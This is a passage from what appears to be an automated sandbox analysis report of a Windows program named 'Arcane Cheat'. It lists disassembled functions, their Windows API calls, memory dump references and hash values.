                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: d599c6a5b32b966de8926b03273c11c18b109ba44fe3ec3d21c9a9c2c1586d87
                                  • Instruction ID: 83780b0a61977c73541c5e3ac597b336e51557a4b242dbf28fcfd18876e2b4c9
                                  • Opcode Fuzzy Hash: d599c6a5b32b966de8926b03273c11c18b109ba44fe3ec3d21c9a9c2c1586d87
                                  • Instruction Fuzzy Hash: DFA011EA2AC20ABC300822003C0BC3A022CF0C0BB2B30880AB80AC0080AE800C0A00B2
                                  Function 0083DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: f5768034a64a56f37be84ce2f3beed16f65973a9ac0bdead213f41940be87393
                                  • Instruction ID: 83780b0a61977c73541c5e3ac597b336e51557a4b242dbf28fcfd18876e2b4c9
                                  • Opcode Fuzzy Hash: f5768034a64a56f37be84ce2f3beed16f65973a9ac0bdead213f41940be87393
                                  • Instruction Fuzzy Hash: DFA011EA2AC20ABC300822003C0BC3A022CF0C0BB2B30880AB80AC0080AE800C0A00B2
                                  Function 0083DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 402ba736731e2c360fd7c5067d4c77f1fb3141aa02ec9e41969142075e0cd852
                                  • Instruction ID: 99224c769e08b2d3d8d886ce3112e42ec05fad2838496b86753d3ffd4387f1d0
                                  • Opcode Fuzzy Hash: 402ba736731e2c360fd7c5067d4c77f1fb3141aa02ec9e41969142075e0cd852
                                  • Instruction Fuzzy Hash: 67A011EA2BC302BC300C22003C03C3A022CE0C8B22B30880AB80BE0280AA802C0A80B2
                                  Function 0083DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 38bdc4ced502226d4cdd4b9bea69be88e9c5738c31808d7df631c46ee1da860f
                                  • Instruction ID: 99224c769e08b2d3d8d886ce3112e42ec05fad2838496b86753d3ffd4387f1d0
                                  • Opcode Fuzzy Hash: 38bdc4ced502226d4cdd4b9bea69be88e9c5738c31808d7df631c46ee1da860f
                                  • Instruction Fuzzy Hash: 67A011EA2BC302BC300C22003C03C3A022CE0C8B22B30880AB80BE0280AA802C0A80B2
                                  Function 00829EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetEndOfFile.KERNELBASE(?,00829104,?,?,-00001964), ref: 00829EC2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File
                                  • String ID:
                                  • API String ID: 749574446-0
                                  • Opcode ID: 776811c42112ab33872b1c350d9156a6385706147b2c02e893ceacfc01e556ad
                                  • Instruction ID: f78922cd17d66206049808326ad57686a62ec053ae9859ceb241b0cb05226b31
                                  • Opcode Fuzzy Hash: 776811c42112ab33872b1c350d9156a6385706147b2c02e893ceacfc01e556ad
                                  • Instruction Fuzzy Hash: 69B011300A0A0A8B8E002B30CC088283A20FA2230B30082A0A002CA0A0CB22C002AA00
                                  Function 0083A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetCurrentDirectoryW.KERNELBASE(?,0083A587,C:\Users\user\Desktop,00000000,0086946A,00000006), ref: 0083A326
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory
                                  • String ID:
                                  • API String ID: 1611563598-0
                                  • Opcode ID: b6d7b0382e4c5c0cd81c943eb6384edef764da608cced1fc68b122997164dc41
                                  • Instruction ID: 0b348f479dea2703a900a67e40dbb9e0e383bb4e039a9a2ec5583adf85d70e7f
                                  • Opcode Fuzzy Hash: b6d7b0382e4c5c0cd81c943eb6384edef764da608cced1fc68b122997164dc41
                                  • Instruction Fuzzy Hash: A5A012301D4106568A010B30CC09C1576506760703F0086207002C00A0CF30C814A500

                                  Non-executed Functions

                                  Function 0083B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0083B971
                                  • EndDialog.USER32(?,00000006), ref: 0083B984
                                  • GetDlgItem.USER32(?,0000006C), ref: 0083B9A0
                                  • SetFocus.USER32(00000000), ref: 0083B9A7
                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0083B9E1
                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0083BA18
                                  • FindFirstFileW.KERNEL32(?,?), ref: 0083BA2E
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083BA4C
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0083BA5C
                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0083BA78
                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0083BA94
                                  • _swprintf.LIBCMT ref: 0083BAC4
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0083BAD7
                                  • FindClose.KERNEL32(00000000), ref: 0083BADE
                                  • _swprintf.LIBCMT ref: 0083BB37
                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0083BB4A
                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0083BB67
                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0083BB87
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0083BB97
                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0083BBB1
                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0083BBC9
                                  • _swprintf.LIBCMT ref: 0083BBF5
                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0083BC08
                                  • _swprintf.LIBCMT ref: 0083BC5C
                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0083BC6F
                                    • Part of subcall function 0083A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0083A662
                                    • Part of subcall function 0083A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0085E600,?,?), ref: 0083A6B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                  • API String ID: 797121971-1840816070
                                  • Opcode ID: cb5796aa53e800f3089de012ddf02bec7a83e0aa2a1af0ba7907b1203a35f09e
                                  • Instruction ID: ec24a9f182c5841c82a998ed17767a6f59e4888b87584243e85668f120d5364a
                                  • Opcode Fuzzy Hash: cb5796aa53e800f3089de012ddf02bec7a83e0aa2a1af0ba7907b1203a35f09e
                                  • Instruction Fuzzy Hash: C39193B2144348BBD7319BA4DC49FFB7BACFB89745F040819B749D2091EB75A6048B62
                                  Function 0082718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00827191
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008272F1
                                  • CloseHandle.KERNEL32(00000000), ref: 00827301
                                    • Part of subcall function 00827BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00827C04
                                    • Part of subcall function 00827BF5: GetLastError.KERNEL32 ref: 00827C4A
                                    • Part of subcall function 00827BF5: CloseHandle.KERNEL32(?), ref: 00827C59
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0082730C
                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0082741A
                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00827446
                                  • CloseHandle.KERNEL32(?), ref: 00827457
                                  • GetLastError.KERNEL32 ref: 00827467
                                  • RemoveDirectoryW.KERNEL32(?), ref: 008274B3
                                  • DeleteFileW.KERNEL32(?), ref: 008274DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                  • API String ID: 3935142422-3508440684
                                  • Opcode ID: 8908e205d43799b98d66ca7940a6f5881ac90c4fbeead00d82381c69a280797d
                                  • Instruction ID: 4e0569e6797fa0342d7df3e3b0227b187643dfd7fd49d88ed300affea344a56f
                                  • Opcode Fuzzy Hash: 8908e205d43799b98d66ca7940a6f5881ac90c4fbeead00d82381c69a280797d
                                  • Instruction Fuzzy Hash: 2EB1D571904229ABDF21DF64EC45BEE77B8FF04304F044569F949E7282D734AA89CB61
                                  Function 00823281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog_memcmp
                                  • String ID: CMT$h%u$hc%u
                                  • API String ID: 3004599000-3282847064
                                  • Opcode ID: e6dab02327b0a23277de30d46979c4a60aa0f482f21f2ac03ec72c601a0b1d35
                                  • Instruction ID: 4d33c84b6c1cd0629dbfacc7b23b21fa6c40624bbb8ef261e473e43e1f6ef35c
                                  • Opcode Fuzzy Hash: e6dab02327b0a23277de30d46979c4a60aa0f482f21f2ac03ec72c601a0b1d35
                                  • Instruction Fuzzy Hash: F1329F715106949FDF14DF28D895AEA37A5FF25300F44047EFD8ACB282DB74AA88CB61
                                  Function 0084D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 354c689e3979f597d6ac36488fb72f069912203c35678d96c71dde5deb4b3111
                                  • Instruction ID: c6f931887c9199e9c2ed3950bd6618cafcda7b5557b7a8c79ef2a8209a29b49b
                                  • Opcode Fuzzy Hash: 354c689e3979f597d6ac36488fb72f069912203c35678d96c71dde5deb4b3111
                                  • Instruction Fuzzy Hash: 12C21772E0862C8FDB25CE289D407EAB7B5FB84315F1545EAD84DE7240E778AE818F41
                                  Function 008227E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008227F1
                                  • _strlen.LIBCMT ref: 00822D7F
                                    • Part of subcall function 0083137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0082B652,00000000,?,?,?,00010450), ref: 00831396
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00822EE0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                  • String ID: CMT
                                  • API String ID: 1706572503-2756464174
                                  • Opcode ID: c9d0b726663b5a4458db0db5fd90d80e1d50493dd01ed11d3516f874b591a4c0
                                  • Instruction ID: 71050dc3dc8a86692d219180a7956d20a1f14fc1fd4e3b83d5ed72ea93a99d58
                                  • Opcode Fuzzy Hash: c9d0b726663b5a4458db0db5fd90d80e1d50493dd01ed11d3516f874b591a4c0
                                  • Instruction Fuzzy Hash: BC62F1716002649FDF28DF28D8956EA3BE1FF54304F04457DEC9ACB282DB74A985CB61
                                  Function 0084866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00848767
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00848771
                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0084877E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 47f7fe818f5a62ffd5b37809c615ec2ddd93ec4e1e1e9dd88e30da21dd38be44
                                  • Instruction ID: 38e43d4e2327b6bb596a90796f3ea3a7f9f6ada5c622b51ffe6bb3ff7069bc73
                                  • Opcode Fuzzy Hash: 47f7fe818f5a62ffd5b37809c615ec2ddd93ec4e1e1e9dd88e30da21dd38be44
                                  • Instruction Fuzzy Hash: 7531A57590122C9BCB61DF68D88979CB7B8FF58310F5041EAE90CA6251EB349B858F85
                                  Function 0084CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                  • Instruction ID: 3aee838f00b909b4d9bbadfe15536dacdec51780e09596e4a094459429d7bde3
                                  • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                  • Instruction Fuzzy Hash: 92023C71E012199BDF54CFA9C8806ADFBF5FF88314F25816AE819E7384D731A9418B90
                                  Function 0083A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0083A662
                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,0085E600,?,?), ref: 0083A6B1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FormatInfoLocaleNumber
                                  • String ID:
                                  • API String ID: 2169056816-0
                                  • Opcode ID: ebad30b39254b8d714b616e9f881acd8d09b7bc52a27ceb27bff1f5a549bb770
                                  • Instruction ID: d15cd0b3cf37744f2e0c3b2050abe35518c865c3e529286aa01c64873205ff39
                                  • Opcode Fuzzy Hash: ebad30b39254b8d714b616e9f881acd8d09b7bc52a27ceb27bff1f5a549bb770
                                  • Instruction Fuzzy Hash: D5019A3A110308BADB218FA4EC09FAB77BCFF59351F004422BA08D7250E3749A64CBA5
                                  Function 00826EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(0083117C,?,00000200), ref: 00826EC9
                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00826EEA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
